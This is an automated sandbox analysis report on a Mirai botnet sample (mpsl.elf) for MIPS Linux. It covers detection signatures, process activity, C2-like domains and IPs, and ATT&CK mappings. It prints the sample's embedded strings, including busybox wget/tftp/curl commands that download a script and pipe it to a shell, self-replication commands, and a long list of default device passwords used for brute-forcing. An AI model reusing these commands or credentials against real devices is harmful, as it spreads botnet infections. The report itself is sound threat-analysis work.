Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:mpsl.elf
Analysis ID:1611410
MD5:006a9f92b1832282b8be08d734c54df9
SHA1:1b1d9af01b6aa83488277ad3e76ff5e673b88ea1
SHA256:e622a68781028bc9b322a1ad66d092295ac96203bd7adf39c19009de6e1146bb
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:84
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample tries to kill multiple processes (SIGKILL)
Sends malformed DNS queries
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1611410
Start date and time:2025-02-10 21:07:24 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 3m 41s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mpsl.elf
Detection:MAL
Classification:mal84.spre.troj.linELF@0/0@22/0
  • VT rate limit hit for: cats-master.ru. [malformed]
  • VT rate limit hit for: gokittler.ru. [malformed]
  • VT rate limit hit for: thekittler.ru. [malformed]
Command:/tmp/mpsl.elf
PID:6236
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:
  • system is lnxubuntu20
  • mpsl.elf (PID: 6236, Parent: 6160, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf
    • mpsl.elf New Fork (PID: 6239, Parent: 6236)
      • mpsl.elf New Fork (PID: 6241, Parent: 6239)
      • mpsl.elf New Fork (PID: 6245, Parent: 6239)
      • mpsl.elf New Fork (PID: 6246, Parent: 6239)
  • gdm3 New Fork (PID: 6271, Parent: 1320)
  • Default (PID: 6271, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6276, Parent: 1320)
  • Default (PID: 6276, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • rm (PID: 6278, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
  • xfwm4 (PID: 6280, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
  • xfdesktop (PID: 6282, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • xfce4-panel (PID: 6284, Parent: 1900, MD5: a15b657c7d54ac1385f1f15004ea6784) Arguments: xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
  • xfwm4 (PID: 6286, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
  • xfwm4 (PID: 6289, Parent: 1900, MD5: 59defa3c00cc30d85ed77b738d55e9da) Arguments: xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
  • xfdesktop (PID: 6291, Parent: 1900, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
mpsl.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    mpsl.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      SourceRuleDescriptionAuthorStrings
      6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              6241.1.00007f65ec400000.00007f65ec41d000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
                Click to see the 1 entries
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: mpsl.elfAvira: detected
                Source: mpsl.elfReversingLabs: Detection: 42%
                Source: mpsl.elfString: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0

                Networking

                barindex
                Source: global trafficTCP traffic: 185.93.89.106 ports 38241,1,2,3,4,8
                Source: global trafficDNS traffic detected: malformed DNS query: gokittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: kittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: cats-master.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: thekittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: cuttiecats.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: mykittler.ru. [malformed]
                Source: global trafficDNS traffic detected: malformed DNS query: cat-are-here.ru. [malformed]
                Source: global trafficTCP traffic: 192.168.2.23:39752 -> 185.93.89.106:38241
                Source: /tmp/mpsl.elf (PID: 6236)Socket: 127.0.0.1:39148Jump to behavior
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: unknownTCP traffic detected without corresponding DNS query: 200.75.33.18
                Source: unknownTCP traffic detected without corresponding DNS query: 120.128.61.54
                Source: unknownTCP traffic detected without corresponding DNS query: 173.161.235.67
                Source: unknownTCP traffic detected without corresponding DNS query: 103.55.183.129
                Source: unknownTCP traffic detected without corresponding DNS query: 131.147.132.9
                Source: unknownTCP traffic detected without corresponding DNS query: 74.69.249.210
                Source: unknownTCP traffic detected without corresponding DNS query: 41.126.85.162
                Source: unknownTCP traffic detected without corresponding DNS query: 21.205.134.202
                Source: unknownTCP traffic detected without corresponding DNS query: 9.138.94.12
                Source: unknownTCP traffic detected without corresponding DNS query: 2.229.119.203
                Source: unknownTCP traffic detected without corresponding DNS query: 34.111.106.211
                Source: unknownTCP traffic detected without corresponding DNS query: 119.174.32.119
                Source: unknownTCP traffic detected without corresponding DNS query: 115.96.123.252
                Source: unknownTCP traffic detected without corresponding DNS query: 84.148.98.147
                Source: unknownTCP traffic detected without corresponding DNS query: 61.226.72.47
                Source: unknownTCP traffic detected without corresponding DNS query: 198.125.69.222
                Source: unknownTCP traffic detected without corresponding DNS query: 167.57.47.185
                Source: unknownTCP traffic detected without corresponding DNS query: 48.130.37.45
                Source: unknownTCP traffic detected without corresponding DNS query: 113.91.171.126
                Source: unknownTCP traffic detected without corresponding DNS query: 94.105.81.74
                Source: unknownTCP traffic detected without corresponding DNS query: 85.25.61.237
                Source: unknownTCP traffic detected without corresponding DNS query: 212.237.38.75
                Source: unknownTCP traffic detected without corresponding DNS query: 173.161.235.67
                Source: unknownTCP traffic detected without corresponding DNS query: 200.75.33.18
                Source: unknownTCP traffic detected without corresponding DNS query: 120.128.61.54
                Source: unknownTCP traffic detected without corresponding DNS query: 103.55.183.129
                Source: unknownTCP traffic detected without corresponding DNS query: 131.147.132.9
                Source: unknownTCP traffic detected without corresponding DNS query: 21.205.134.202
                Source: unknownTCP traffic detected without corresponding DNS query: 41.126.85.162
                Source: unknownTCP traffic detected without corresponding DNS query: 9.138.94.12
                Source: unknownTCP traffic detected without corresponding DNS query: 74.69.249.210
                Source: unknownTCP traffic detected without corresponding DNS query: 119.174.32.119
                Source: unknownTCP traffic detected without corresponding DNS query: 34.111.106.211
                Source: unknownTCP traffic detected without corresponding DNS query: 2.229.119.203
                Source: unknownTCP traffic detected without corresponding DNS query: 115.96.123.252
                Source: unknownTCP traffic detected without corresponding DNS query: 84.148.98.147
                Source: unknownTCP traffic detected without corresponding DNS query: 198.125.69.222
                Source: unknownTCP traffic detected without corresponding DNS query: 167.57.47.185
                Source: unknownTCP traffic detected without corresponding DNS query: 48.130.37.45
                Source: unknownTCP traffic detected without corresponding DNS query: 94.105.81.74
                Source: unknownTCP traffic detected without corresponding DNS query: 85.25.61.237
                Source: unknownTCP traffic detected without corresponding DNS query: 61.226.72.47
                Source: unknownTCP traffic detected without corresponding DNS query: 113.91.171.126
                Source: unknownTCP traffic detected without corresponding DNS query: 212.237.38.75
                Source: unknownTCP traffic detected without corresponding DNS query: 179.227.37.131
                Source: unknownTCP traffic detected without corresponding DNS query: 179.227.37.131
                Source: unknownTCP traffic detected without corresponding DNS query: 119.91.247.155
                Source: unknownTCP traffic detected without corresponding DNS query: 119.91.247.155
                Source: unknownTCP traffic detected without corresponding DNS query: 195.25.99.200
                Source: unknownTCP traffic detected without corresponding DNS query: 195.25.99.200
                Source: global trafficDNS traffic detected: DNS query: newkittler.ru
                Source: global trafficDNS traffic detected: DNS query: gokittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: cats-master.ru
                Source: global trafficDNS traffic detected: DNS query: kittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: kittlerer.ru
                Source: global trafficDNS traffic detected: DNS query: cats-master.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: thekittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: qittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: cuttiecats.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: polizei.su. [malformed]
                Source: global trafficDNS traffic detected: DNS query: kittlez.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: mykittler.ru. [malformed]
                Source: global trafficDNS traffic detected: DNS query: cat-are-here.ru. [malformed]
                Source: mpsl.elfString found in binary or memory: http:///curl.sh
                Source: mpsl.elfString found in binary or memory: http:///wget.sh
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

                System Summary

                barindex
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1612, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6218, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6241, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6245, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6272, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6277, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6278, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6279, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6280, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6281, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6282, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6283, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6284, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6285, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6286, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6287, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6288, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6289, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6290, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6291, result: successfulJump to behavior
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: usage: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
                Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
                Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
                Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
                Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrep
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
                Source: Initial sampleString containing 'busybox' found: /bin/busyboxenableshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x lzrd; ./lzrd; ./rep.i486 selfrep; ./rep.x86 selfrep; ./rep.i686 selfrep; ./rep.x86_64 selfrep; ./rep.mips selfrep; ./rep.mpsl selfrep; ./rep.arm4 selfrep; ./rep.arm5 selfrep; ./rep.arm6 selfrep; ./rep.arm7 selfrep; ./rep.ppc selfrep; ./rep.spc selfrep; ./rep.m68k selfrep; ./rep.sh4 selfrep; ./rep.arc selfrepThe People'sincorrectinvalidbadwrongfaildeniederrorretryGET /dlr. HTTP/1.0
                Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne >> > .d
                Source: Initial sampleString containing potential weak password found: 54321
                Source: Initial sampleString containing potential weak password found: 654321
                Source: Initial sampleString containing potential weak password found: default
                Source: Initial sampleString containing potential weak password found: admin1234
                Source: Initial sampleString containing potential weak password found: service
                Source: Initial sampleString containing potential weak password found: password
                Source: Initial sampleString containing potential weak password found: guest
                Source: Initial sampleString containing potential weak password found: support
                Source: Initial sampleString containing potential weak password found: administrator
                Source: Initial sampleString containing potential weak password found: supervisor
                Source: ELF static info symbol of initial sample.symtab present: no
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 720, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 721, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 788, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 884, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 904, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1475, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1576, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1601, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1612, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1877, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1900, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 1983, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2028, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2048, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2050, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2062, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2063, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2069, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2074, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2096, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2097, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2102, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2123, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 2126, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6218, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6241, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6245, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6272, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6277, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6278, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6279, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6280, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6281, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6282, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6283, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6284, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6285, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6286, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6287, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6288, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6289, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6290, result: successfulJump to behavior
                Source: /tmp/mpsl.elf (PID: 6246)SIGKILL sent: pid: 6291, result: successfulJump to behavior
                Source: classification engineClassification label: mal84.spre.troj.linELF@0/0@22/0
                Source: /usr/bin/xfce4-session (PID: 6278)Rm executable: /usr/bin/rm -> rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51Jump to behavior
                Source: /tmp/mpsl.elf (PID: 6236)Queries kernel information via 'uname': Jump to behavior
                Source: mpsl.elf, 6236.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6241.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6245.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
                Source: mpsl.elfBinary or memory string: vmware
                Source: mpsl.elfBinary or memory string: vmware123
                Source: mpsl.elfBinary or memory string: nE7jA%5mmicrobusinessPASSWORDmeinsmcms500adslnadamgiraff666666zoomadslsuperadminIs@dminikwbalpineasantepuconexantaquariotinitsunamivertex25ektks123inflectionip20anicuscADMINpermitpldtadminonexantdvr2580222Win1doW$true5432112341234JVC3500/24sitecom46ironport88888888uClinuxvolition2800tslinuxsecurityatlantis888888nCwMnJVGagbaby00000000openelec1111111kont2004rpitc123123696969362729atc456hp.comcycl3R0cks!letacla000000nosoup4u11111111Gin51mvf3mg3500merlin99999999admin1anni201322222mlusrlogin3333333adminpldtbbsd-clientchangeme2support123aerohiveadmin00vmware123utstartl789l3tm31nseiko2005tivonpw,ba23422222222admintrupt1789admdarkcusadminhighspeedascendMenarasysAdmin33333oracleanicust3333wbox123attackAscendAitbISP4eCiGadmin@mymifi2222222dPZb4GJTu9ROOMeins1988321piloucomcastsetupZmqVfoSIP333333michelangeloCOadmin123Zntslqblendervt100admin_1pfsensehellotest1my_DEMARCjvswitchezdvr7ujMko0root/ADMIN/adminlvjhadminlvjh1232010vstaxmhdpicruntop10qwertyQwestM0demqweasdzxguest123h2014071TANDBERGWprootarkeiachangemenowf00b@rarticawww9311supersurtiwkbadmintesthuigu309UsernetscreenpitaZz@23495859Root1password123fidel123annie2016asdfghdottietwe8ehomebatman123hackedwelcomeyellowD13hh[china123p@ssw0rdjordanhackmewagodasdec1patrickgforgeEminemspidermansparkypassword1shadowgatewaydiamondprincessflowerchelsearichardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword123456789Metallicacowboy1999654321slipknotstarwarsCharlie1997daddyRootdragonhustonfuckmepussytrustno1cowboysfootballsmcadminsysadmvmwareprofensegamezlrkr0x123qwesuperuserIntraStackAsantecraftcrftpwfriendrootmeP@55w0rd!debugrainCisconsrootinformixmediatorqwe123db2fenc1ibmdb2forgotvideoinfobloxdb2inst1nagiosxiiclocktimelyenablediagdraytekdbadminsq!us3rglftpddiagdangerapcAlphanetworkswrgg15_di524adminHWapacheabcwebserverapache123arpwatchavinashaspbackupadminazzakhalelbackuppukcabasteriskbackupscmhealthbadservercactielliebackup1234cloudcbscbs123billsupermenbenutzerpasswortftp1234annie2013annie2015annie2012annie2014jvcepicrouter
                Source: mpsl.elf, 6236.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6241.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmp, mpsl.elf, 6245.1.000055c6ef376000.000055c6ef3fd000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
                Source: mpsl.elf, 6236.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6241.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6245.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmpBinary or memory string: :x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
                Source: mpsl.elf, 6245.1.00007f65ec462000.00007f65ec497000.rw-.sdmpBinary or memory string: vmware123F
                Source: mpsl.elf, 6236.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6241.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmp, mpsl.elf, 6245.1.00007ffecdebc000.00007ffecdedd000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: mpsl.elf, type: SAMPLE
                Source: Yara matchFile source: 6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6241.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: mpsl.elf, type: SAMPLE
                Source: Yara matchFile source: 6245.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6236.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6241.1.00007f65ec400000.00007f65ec41d000.r-x.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path Interception1
                File Deletion
                1
                Brute Force
                11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network Medium1
                Service Stop
